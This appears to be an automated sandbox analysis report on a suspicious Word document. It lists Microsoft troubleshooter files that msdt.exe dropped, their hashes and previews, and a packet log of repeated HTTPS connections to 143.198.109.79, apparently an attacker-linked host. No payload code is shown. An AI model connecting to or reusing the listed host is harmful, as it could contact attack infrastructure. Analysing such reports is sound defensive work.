                                                                                                                                                                                                      Size (bytes):50242
                                                                                                                                                                                                      Entropy (8bit):4.932919499511673
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:384:/wugEs5GhrQzYjGBHvPbD9FZahXuDzsP6qqF8DdEakDiqeXacgcRjdhGPtQMHQF4:/c5AMHvDDf2VE+quAiMw4
                                                                                                                                                                                                      MD5:EDF1259CD24332F49B86454BA6F01EAB
                                                                                                                                                                                                      SHA1:7F5AA05727B89955B692014C2000ED516F65D81E
                                                                                                                                                                                                      SHA-256:AB41C00808ADAD9CB3D76405A9E0AEE99FB6E654A8BF38DF5ABD0D161716DC27
                                                                                                                                                                                                      SHA-512:A6762849FEDD98F274CA32EB14EC918FDBE278A332FDA170ED6D63D4C86161F2208612EB180105F238893A2D2B107228A3E7B12E75E55FDE96609C69C896EBA0
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#This is passed from the troubleshooter via 'Add-DiagRootCause'..PARAM($targetPath, $appName)....#RS_ProgramCompatibilityWizard..#rparsons - 05 May 2008..#rfink - 01 Sept 2008 - rewrite to support dynamic choices....#set-psdebug -strict -trace 0....#change HKLM\Software\Windows NT\CurrentVersion\AppCompatFlags\CompatTS EnableTracing(DWORD) to 1..#if you want to enable tracing..$SpewTraceToDesktop = $false....Import-LocalizedData -BindingVariable CompatibilityStrings -FileName CL_LocalizationData....#Compatibility modes..$CompatibilityModes = new-Object System.Collections.Hashtable..$CompatibilityModes.Add("Version_WIN8RTM", "WIN8RTM")..$CompatibilityModes.Add("Version_WIN7RTM", "WIN7RTM")..$CompatibilityModes.Add("Version_WINVISTA2", "VISTASP2")..$CompatibilityModes.Add("Version_WINXP3", "WINXPSP3")..$CompatibilityModes.Add("Version_MSIAUTO", "MSIAUTO")..$CompatibilityModes.Add("Version_UNKNOWN", "WINXPSP3")..$Comp

                                                                                                                                                                                                      C:\Windows\Temp\SDIAG_4c029c1e-7995-47bb-b731-778fea2bf65c\TS_ProgramCompatibilityWizard.ps1

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                                                      File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):16946
                                                                                                                                                                                                      Entropy (8bit):4.860026903688885
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:384:3FptgXhu9IOM7BTDLwU7GHf7FajKFzB9Ww:Ghu9I9dQYWB9Ww
                                                                                                                                                                                                      MD5:2C245DE268793272C235165679BF2A22
                                                                                                                                                                                                      SHA1:5F31F80468F992B84E491C9AC752F7AC286E3175
                                                                                                                                                                                                      SHA-256:4A6E9F400C72ABC5B00D8B67EA36C06E3BC43BA9468FE748AEBD704947BA66A0
                                                                                                                                                                                                      SHA-512:AAECB935C9B4C27021977F211441FF76C71BA9740035EC439E9477AE707109CA5247EA776E2E65159DCC500B0B4324F3733E1DFB05CEF10A39BB11776F74F03C
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#TS_ProgramCompatibilityWizard..#rparsons - 05 May 2008....$ShortcutListing = New-Object System.Collections.Hashtable..$ExeListing = New-Object System.Collections.ArrayList..$CombinedListing = New-Object System.Collections.ArrayList....Import-LocalizedData -BindingVariable CompatibilityStrings -FileName CL_LocalizationData....# Block PCW on unsupported SKUs..$BlockedSKUs = @(178)..[Int32]$OSSKU = (Get-WmiObject -Class "Win32_OperatingSystem").OperatingSystemSKU..if ($BlockedSKUs.Contains($OSSKU))..{.. return..}....$typeDefinition = @"....using System;..using System.IO;..using System.Runtime.InteropServices;..using System.Text;..using System.Collections;....public class Utility..{.. public static string GetStartMenuPath().. {.. return Environment.GetFolderPath(Environment.SpecialFolder.StartMenu);.. }.... public static string GetAllUsersStartMenuPath().. {.. return Path.Combine(Environ

                                                                                                                                                                                                      C:\Windows\Temp\SDIAG_4c029c1e-7995-47bb-b731-778fea2bf65c\VF_ProgramCompatibilityWizard.ps1

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                                                      File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):453
                                                                                                                                                                                                      Entropy (8bit):4.983419443697541
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:12:QcM3BFN+dxmVdyKVCkLZI4S2xhzoJNIDER5lI02xzS4svc3uVr:Qb3DQbeCklTxhzoJUoS02tCr
                                                                                                                                                                                                      MD5:60A20CE28D05E3F9703899DF58F17C07
                                                                                                                                                                                                      SHA1:98630ABC4B46C3F9BD6AF6F1D0736F2B82551CA9
                                                                                                                                                                                                      SHA-256:B71BC60C5707337F4D4B42BA2B3D7BCD2BA46399D361E948B9C2E8BC15636DA2
                                                                                                                                                                                                      SHA-512:2B2331B2DD28FB0BBF95DC8C6CA7E40AA56D4416C269E8F1765F14585A6B5722C689BCEBA9699DFD7D97903EF56A7A535E88EAE01DFCC493CEABB69856FFF9AA
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#if this environment variable is set, we say that we don't detect the problem anymore so it will..#show as fixed in the final screen..PARAM($appName)....$detected = $true..if ($Env:AppFixed -eq $true)..{.. $detected = $false ..}....Update-DiagRootCause -id "RC_IncompatibleApplication" -iid $appName -Detected $detected....#RS_ProgramCompatibilityWizard..#rparsons - 05 May 2008....

                                                                                                                                                                                                      C:\Windows\Temp\SDIAG_4c029c1e-7995-47bb-b731-778fea2bf65c\en-US\CL_LocalizationData.psd1

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):6650
                                                                                                                                                                                                      Entropy (8bit):3.6751460885012333
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:96:q39pB3hpieJGhn8n/y7+aqwcQoXQZWx+cWUcYpy7I6D1RUh5EEjQB5dm:q39pRhp6Sy6wZifVEtjjFm
                                                                                                                                                                                                      MD5:E877AD0545EB0ABA64ED80B576BB67F6
                                                                                                                                                                                                      SHA1:4D200348AD4CA28B5EFED544D38F4EC35BFB1204
                                                                                                                                                                                                      SHA-256:8CAC8E1DA28E288BF9DB07B2A5BDE294122C8D2A95EA460C757AE5BAA2A05F27
                                                                                                                                                                                                      SHA-512:6055EC9A2306D9AA2F522495F736FBF4C3EB4078AD1F56A6224FF42EF525C54FF645337D2525C27F3192332FF56DDD5657C1384846678B343B2BFA68BD478A70
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:..#. .L.o.c.a.l.i.z.e.d...0.4./.1.1./.2.0.1.8. .0.2.:.0.5. .P.M. .(.G.M.T.)...3.0.3.:.4...8.0...0.4.1.1. ...C.L._.L.o.c.a.l.i.z.a.t.i.o.n.D.a.t.a...p.s.d.1.....#. .L.o.c.a.l.i.z.e.d...0.1./.0.4./.2.0.1.3. .1.1.:.3.2. .A.M. .(.G.M.T.)...3.0.3.:.4...8.0...0.4.1.1. ...C.L._.L.o.c.a.l.i.z.a.t.i.o.n.D.a.t.a...p.s.d.1.....C.o.n.v.e.r.t.F.r.o.m.-.S.t.r.i.n.g.D.a.t.a. .@.'.....#.#.#.P.S.L.O.C.....P.r.o.g.r.a.m._.C.h.o.i.c.e._.N.O.T.L.I.S.T.E.D.=.N.o.t. .L.i.s.t.e.d.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.D.E.F.A.U.L.T.=.N.o.n.e.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.8.R.T.M.=.W.i.n.d.o.w.s. .8.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.7.R.T.M.=.W.i.n.d.o.w.s. .7.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.V.I.S.T.A.2.=.W.i.n.d.o.w.s. .V.i.s.t.a. .(.S.e.r.v.i.c.e. .P.a.c.k. .2.).....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.X.P.S.P.3.=.W.i.n.d.o.w.s. .X.P. .(.S.e.r.v.i.c.e. .P.a.c.k. .3.).....V.e.r.s.i.o.n._.C.h.o.i.c.e._.M.S.I.A.U.T.O.=.S.k.i.p. .V.e.r.s.i.o.n. .C.h.e.c.k.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.U.N.

                                                                                                                                                                                                      C:\Windows\Temp\SDIAG_4c029c1e-7995-47bb-b731-778fea2bf65c\en-US\DiagPackage.dll.mui

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):10752
                                                                                                                                                                                                      Entropy (8bit):3.517898352371806
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:96:Gmw56QoV8m7t/C7eGu7tCuKFtrHQcoC1dIO4Pktmg5CuxbEWgdv0WwF:WAQovu548tmirAWu8Wm
                                                                                                                                                                                                      MD5:CC3C335D4BBA3D39E46A555473DBF0B8
                                                                                                                                                                                                      SHA1:92ADCDF1210D0115DB93D6385CFD109301DEAA96
                                                                                                                                                                                                      SHA-256:330A1D9ADF3C0D651BDD4C0B272BF2C7F33A5AF012DEEE8D389855D557C4D5FD
                                                                                                                                                                                                      SHA-512:49CBF166122D13EEEA2BF2E5F557AA8696B859AEA7F79162463982BBF43499D98821C3C2664807EDED0A250D9176955FB5B1B39A79CDF9C793431020B682ED12
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.......R...P...R.Rich..R.................PE..L..................!.........(...............................................P...........@.......................................... ...$..............................8............................................................................rdata..............................@..@.rsrc....0... ...&..................@..@......E.........T...8...8.........E.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....#..0!...rsrc$02.... .......OV....,.+.(,..vA..@..E.........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                      C:\Windows\Temp\SDIAG_4c029c1e-7995-47bb-b731-778fea2bf65c\result\results.xsl

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):48956
                                                                                                                                                                                                      Entropy (8bit):5.103589775370961
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:768:hUeTHmb0+tk+Ci10ycNV6OW9a+KDoVxrVF+bBH0t9mYNJ7u2+d:hUcHXDY10tNV6OW9abDoVxrVF+bBH0tO
                                                                                                                                                                                                      MD5:310E1DA2344BA6CA96666FB639840EA9
                                                                                                                                                                                                      SHA1:E8694EDF9EE68782AA1DE05470B884CC1A0E1DED
                                                                                                                                                                                                      SHA-256:67401342192BABC27E62D4C1E0940409CC3F2BD28F77399E71D245EAE8D3F63C
                                                                                                                                                                                                      SHA-512:62AB361FFEA1F0B6FF1CC76C74B8E20C2499D72F3EB0C010D47DBA7E6D723F9948DBA3397EA26241A1A995CFFCE2A68CD0AAA1BB8D917DD8F4C8F3729FA6D244
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:<?xml version="1.0"?>..<?Copyright (c) Microsoft Corporation. All rights reserved.?>..<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:ms="urn:microsoft-performance" exclude-result-prefixes="msxsl" version="1.0">...<xsl:output method="html" indent="yes" standalone="yes" encoding="UTF-16"/>...<xsl:template name="localization">....<_locDefinition>.....<_locDefault _loc="locNone"/>.....<_locTag _loc="locData">String</_locTag>.....<_locTag _loc="locData">Font</_locTag>.....<_locTag _loc="locData">Mirror</_locTag>....</_locDefinition>...</xsl:template>... ********** Images ********** -->...<xsl:variable name="images">....<Image id="check">res://sdiageng.dll/check.png</Image>....<Image id="error">res://sdiageng.dll/error.png</Image>....<Image id="info">res://sdiageng.dll/info.png</Image>....<Image id="warning">res://sdiageng.dll/warning.png</Image>....<Image id="expand">res://sdiageng.dll/expand.png</Image>....<Image id="

                                                                                                                                                                                                      Static File Info

                                                                                                                                                                                                      General

                                                                                                                                                                                                      File type:Microsoft OOXML
                                                                                                                                                                                                      Entropy (8bit):7.832260939059278
                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                      • Word Microsoft Office Open XML Format document (49504/1) 49.01%
                                                                                                                                                                                                      • Word Microsoft Office Open XML Format document (43504/1) 43.07%
                                                                                                                                                                                                      • ZIP compressed archive (8000/1) 7.92%
                                                                                                                                                                                                      File name:qoIZSkdejM.docx
                                                                                                                                                                                                      File size:10469
                                                                                                                                                                                                      MD5:0d37337ead8492e1b2395f6cd4f724fc
                                                                                                                                                                                                      SHA1:a66ff1064025c026f2d88b87796009ba34c1bee8
                                                                                                                                                                                                      SHA256:cd3132beed7d712a890f83dc302765bfa232e5b059a6fa7b4ee5355f11b55368
                                                                                                                                                                                                      SHA512:113711a807da1417cff28760d0050543631c969725c65b7b32da874cc07c16baa24a894c97ffc185cbdc574c62f078621216d7e970cdf7c89e553ca5f2fdbd2a
                                                                                                                                                                                                      SSDEEP:192:R8D/fgUUn+iZ7dADiIF8TBIuICjBlK2dRBeVeT6lf/XO+ra8a:R8bfgzn+iZ7dADiIF8NIFCu2dRBOm6lK
                                                                                                                                                                                                      TLSH:9322BF35DF0A2D52C00BC23B60060706E44B68F3DA6F2A4FF6901AD6CD624EC175DD5E
                                                                                                                                                                                                      File Content Preview:PK...........T...lU... .......[Content_Types].xml...N.0.E.H.C.m..e..j...%T.|.kOZ..dO_...)..J#..DJf.=w.....5..b...lP.Y.Nz...d.....e..S.x.%.Bb....p...2R.T..b..<..X....Q......8.A..1.~...r.....k.6.>B%.....}n.D0.e.Mc.*...h)..|...%...R.z.B...............&j..DD|

                                                                                                                                                                                                      File Icon

                                                                                                                                                                                                      Icon Hash:74fcd0d2d6d6d0cc

                                                                                                                                                                                                      Network Behavior

                                                                                                                                                                                                      Network Port Distribution

                                                                                                                                                                                                      TCP Packets

                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                      Aug 18, 2022 08:34:47.013371944 CEST49741443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:47.013432026 CEST44349741143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:47.013545990 CEST49741443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:47.013973951 CEST49741443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:47.013993025 CEST44349741143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:47.380207062 CEST44349741143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:47.380395889 CEST49741443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:47.406874895 CEST49741443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:47.406907082 CEST44349741143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:47.407172918 CEST44349741143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:47.408890963 CEST49741443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:47.451384068 CEST44349741143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:47.730277061 CEST44349741143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:47.730345011 CEST44349741143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:47.730469942 CEST49741443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:47.737023115 CEST49741443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:47.737052917 CEST44349741143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:47.737065077 CEST49741443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:47.737073898 CEST44349741143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:47.810991049 CEST49742443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:47.811052084 CEST44349742143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:47.811173916 CEST49742443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:47.811434984 CEST49742443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:47.811451912 CEST44349742143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:48.161988974 CEST44349742143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:48.162623882 CEST49742443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:48.162676096 CEST44349742143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:48.164474964 CEST49742443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:48.164505005 CEST44349742143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:48.508094072 CEST44349742143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:48.508224964 CEST44349742143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:48.508285999 CEST49742443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:48.509584904 CEST49742443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:48.509624958 CEST44349742143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:48.509640932 CEST49742443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:48.509651899 CEST44349742143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:51.547524929 CEST49743443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:51.547570944 CEST44349743143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:51.547744036 CEST49743443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:51.547998905 CEST49743443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:51.548013926 CEST44349743143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:51.908436060 CEST44349743143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:51.909096003 CEST49743443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:51.909116030 CEST44349743143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:51.911393881 CEST49743443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:51.911411047 CEST44349743143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:52.264444113 CEST44349743143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:52.264519930 CEST44349743143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:52.264609098 CEST49743443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:52.264751911 CEST49743443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:52.264767885 CEST44349743143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:52.264794111 CEST49743443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:52.264801025 CEST44349743143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:52.383800030 CEST49744443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:52.383826971 CEST44349744143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:52.383946896 CEST49744443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:52.384795904 CEST49744443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:52.384807110 CEST44349744143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:52.749547005 CEST44349744143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:52.749768019 CEST49744443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:52.796416998 CEST49744443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:52.796448946 CEST44349744143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:52.796708107 CEST44349744143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:52.796803951 CEST49744443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:52.797610044 CEST49744443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:52.839401960 CEST44349744143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:53.106933117 CEST44349744143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:53.107013941 CEST44349744143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:53.107074022 CEST49744443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:53.107096910 CEST44349744143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:53.107110977 CEST49744443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:53.107173920 CEST49744443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:53.110171080 CEST44349744143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:53.110275984 CEST44349744143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:53.110297918 CEST49744443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:53.110327005 CEST49744443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:53.110780001 CEST49744443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:53.110796928 CEST44349744143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:53.334995985 CEST49745443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:53.335031986 CEST44349745143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:53.335129976 CEST49745443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:53.335481882 CEST49745443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:53.335494041 CEST44349745143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:53.686470985 CEST44349745143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:53.686671019 CEST49745443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:53.687242031 CEST49745443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:53.687254906 CEST44349745143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:53.693726063 CEST49745443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:53.693757057 CEST44349745143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:54.035067081 CEST44349745143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:54.035320044 CEST49745443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:54.035334110 CEST44349745143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:54.035494089 CEST49745443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:54.035556078 CEST44349745143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:54.035620928 CEST49745443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:54.035712957 CEST49745443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:54.035727024 CEST44349745143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:54.035742998 CEST49745443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:54.035782099 CEST49745443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:54.215761900 CEST49746443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:54.215801001 CEST44349746143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:54.215888023 CEST49746443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:54.216280937 CEST49746443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:54.216291904 CEST44349746143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:54.589816093 CEST44349746143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:54.589998007 CEST49746443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:54.590410948 CEST49746443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:54.590419054 CEST44349746143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:54.593725920 CEST49746443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:54.593744040 CEST44349746143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:54.949111938 CEST44349746143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:54.949254990 CEST49746443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:54.949357986 CEST44349746143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:54.949415922 CEST44349746143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:54.949430943 CEST49746443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:54.949464083 CEST49746443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:55.014930010 CEST49746443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:55.014971018 CEST44349746143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:55.015073061 CEST49746443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:55.015089989 CEST49746443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:55.137301922 CEST49747443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:55.137373924 CEST44349747143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:55.137474060 CEST49747443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:55.137681007 CEST49747443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:55.137705088 CEST44349747143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:55.500863075 CEST44349747143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:55.510864019 CEST49747443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:55.510917902 CEST44349747143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:55.512223005 CEST49747443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:55.512245893 CEST44349747143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:55.856849909 CEST44349747143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:55.856945038 CEST44349747143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:55.857042074 CEST49747443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:55.857081890 CEST49747443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:55.857100964 CEST44349747143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:55.857116938 CEST49747443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:55.857124090 CEST44349747143.198.109.79192.168.2.4
